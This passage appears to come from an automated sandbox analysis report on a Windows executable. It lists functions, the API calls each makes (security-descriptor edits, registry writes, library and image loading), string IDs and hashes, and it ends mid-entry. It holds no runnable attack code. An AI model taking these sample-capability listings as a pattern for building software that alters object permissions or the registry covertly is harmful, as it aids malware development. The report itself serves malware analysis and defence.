                                                                                                                                                                                                                                                                              • Opcode ID: 2286bb68aa0ec8757f14832d3b746e5aed31525b791ef2d7d0d7a56d95a6d767
                                                                                                                                                                                                                                                                              • Instruction ID: d143cf9d212efd5d5bba8a6e836f3086581a59c6c5d38c2132c56ccdae68625e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2286bb68aa0ec8757f14832d3b746e5aed31525b791ef2d7d0d7a56d95a6d767
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E1E131248345CFC754EF24C95087AB7E6BF84314B54896CF8969B3A2DB38ED4ACB91
                                                                                                                                                                                                                                                                              Function 007516D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
                                                                                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00751741
                                                                                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00751775
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0075178C
                                                                                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007517C6
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007517E2
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 007517F9
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00751801
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00751808
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00751829
                                                                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00751830
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0075185F
                                                                                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00751881
                                                                                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00751893
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518BA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518C1
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518CA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518D1
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518DA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518E1
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007518ED
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518F4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: GetProcessHeap.KERNEL32(00000008,007514FD,?,00000000,?,007514FD,?), ref: 00751AED
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007514FD,?), ref: 00751AF4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007514FD,?), ref: 00751B03
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2f31963fcc261292c319f69e81d5fedbfe153905f042bec52b11367e1216ae85
                                                                                                                                                                                                                                                                              • Instruction ID: f1b7adc08a9bb74f09ac7f463f7880a27f9514550d7c6c0f27f9701ce17828bb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f31963fcc261292c319f69e81d5fedbfe153905f042bec52b11367e1216ae85
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F714071D00209AFDF20DFA5DC48FEEBBB9BF04322F548115E915A6190DB799D09CB60
                                                                                                                                                                                                                                                                              Function 0077CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077CF1D
                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0078DCD0,00000000,?,00000000,?,?), ref: 0077CFA4
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0077D004
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077D054
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077D0CF
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0077D112
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0077D221
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0077D2AD
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077D2E1
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077D2EE
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0077D3C0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                              • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                              • Opcode ID: 9992aa21a6d2f747b31a4bbce2373d9ffcf8c8d8266650c25a1c63169dc6a5be
                                                                                                                                                                                                                                                                              • Instruction ID: d73a5ea2fbe9c4c3663b2158653185440aaed7045c634d271e812174f30d329b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9992aa21a6d2f747b31a4bbce2373d9ffcf8c8d8266650c25a1c63169dc6a5be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9127C356042059FCB24DF14C885A2ABBF6FF88754F14849CF98A9B3A2CB35ED41CB85
                                                                                                                                                                                                                                                                              Function 007813BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00781462
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078149D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007814F0
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00781526
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007815A2
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078161D
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                                • Part of subcall function 00753535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00753547
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                              • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                              • Opcode ID: 5485671be5edf1b5a3ff69b3e3ea7eca7007698b3a01405d178464b01a8f1b33
                                                                                                                                                                                                                                                                              • Instruction ID: 0fdaaae105f2373442b5feb0938aed6449ed654d79785d9d82fca01ac8d8c69b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5485671be5edf1b5a3ff69b3e3ea7eca7007698b3a01405d178464b01a8f1b33
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73E1AE71644301CFCB14EF24C45096AB7EAFF94314B54896DF8969B3A2DB38ED46CB81
                                                                                                                                                                                                                                                                              Function 0077D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                              • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                              • Opcode ID: 91474e1488deb589c935a21c80da65a7b4728d699abd1af2efd26b861441855f
                                                                                                                                                                                                                                                                              • Instruction ID: 5383e71bac1b9bc1d39d2750e113b9692d468e9d52417ab7886c369a6efc4b05
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91474e1488deb589c935a21c80da65a7b4728d699abd1af2efd26b861441855f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D471E57260015A8BCF309E7CC9506FA33B5AF607E8B258128FC5E97294EA3DDD55C3A1
                                                                                                                                                                                                                                                                              Function 00788D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DB5
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DC9
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DEC
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788E0F
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00788E4D
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00786691), ref: 00788EA9
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788EE2
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00788F25
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788F5C
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00788F68
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00788F78
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00786691), ref: 00788F87
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00788FA4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00788FB0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                              • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                              • Opcode ID: 12fea1b2c79048f8d6815c9982cc8285c5c3476401dc7429a56a9158be609fc6
                                                                                                                                                                                                                                                                              • Instruction ID: b659ac7c8daee47d41e27bbb9cf7cd4fe42890c51622914d396be68cdd11885a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12fea1b2c79048f8d6815c9982cc8285c5c3476401dc7429a56a9158be609fc6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F610471980219FEEB64EF64CC45BBE77A9BF08B10F508106F914D60D1DB78AD90CBA0
                                                                                                                                                                                                                                                                              Function 007648BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0076493D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764948
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0076499F
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007649DD
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00764A1B
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764A63
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764A9E
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764ACC
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                              • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                              • Opcode ID: 209b1ff6d43a8071e6e3e0762bec91d93153df488488e57bd156f6f6c9fb0643
                                                                                                                                                                                                                                                                              • Instruction ID: 86c777687918c33275fcf604a2b03172f5ec78110d24fb7ed46eea5d9556665a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 209b1ff6d43a8071e6e3e0762bec91d93153df488488e57bd156f6f6c9fb0643
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 317102725083059FC750EF24C84097BBBE9EF94758F00892DF89697261EB39ED45CB91
                                                                                                                                                                                                                                                                              Function 00756382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00756395
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007563A7
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007563BE
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007563D3
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007563D9
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007563E9
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007563EF
                                                                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00756410
                                                                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0075642A
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00756433
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075649A
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007564D6
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 007564DC
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 007564E3
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0075653A
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00756547
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0075656C
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00756596
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 895679908-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3f286aaaff1ff130d4cb3f75fd319f6e5f548b486cbaa523cbee9d0a73f5a15b
                                                                                                                                                                                                                                                                              • Instruction ID: 58bc44d41bac944e41e4d4741176ed10b2c2ca8bd15610edcd47e025d1ce4532
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f286aaaff1ff130d4cb3f75fd319f6e5f548b486cbaa523cbee9d0a73f5a15b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D718F31A00609AFDB20DFA8CE45AAEBBF5FF48705F504518E586A35A0D7B9ED44CB50
                                                                                                                                                                                                                                                                              Function 0077086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00770884
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0077088F
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0077089A
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 007708A5
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 007708B0
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 007708BB
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 007708C6
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 007708D1
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 007708DC
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 007708E7
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 007708F2
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 007708FD
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00770908
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00770913
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0077091E
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00770929
                                                                                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 00770939
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0077097B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                              • Opcode ID: eb86b72a487d72d82dcbc6592330f775d0c701b6d3578f29d03447ab1b56cf56
                                                                                                                                                                                                                                                                              • Instruction ID: cf6d891dfca8a7a9562a10ee70072775675901187c2d35e532294009d73ff56a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb86b72a487d72d82dcbc6592330f775d0c701b6d3578f29d03447ab1b56cf56
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC4166B0D48319AADB10DFB68C85C6EBFE8FF44754B50852AE15CE7291D678E801CF91
                                                                                                                                                                                                                                                                              Function 00753A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
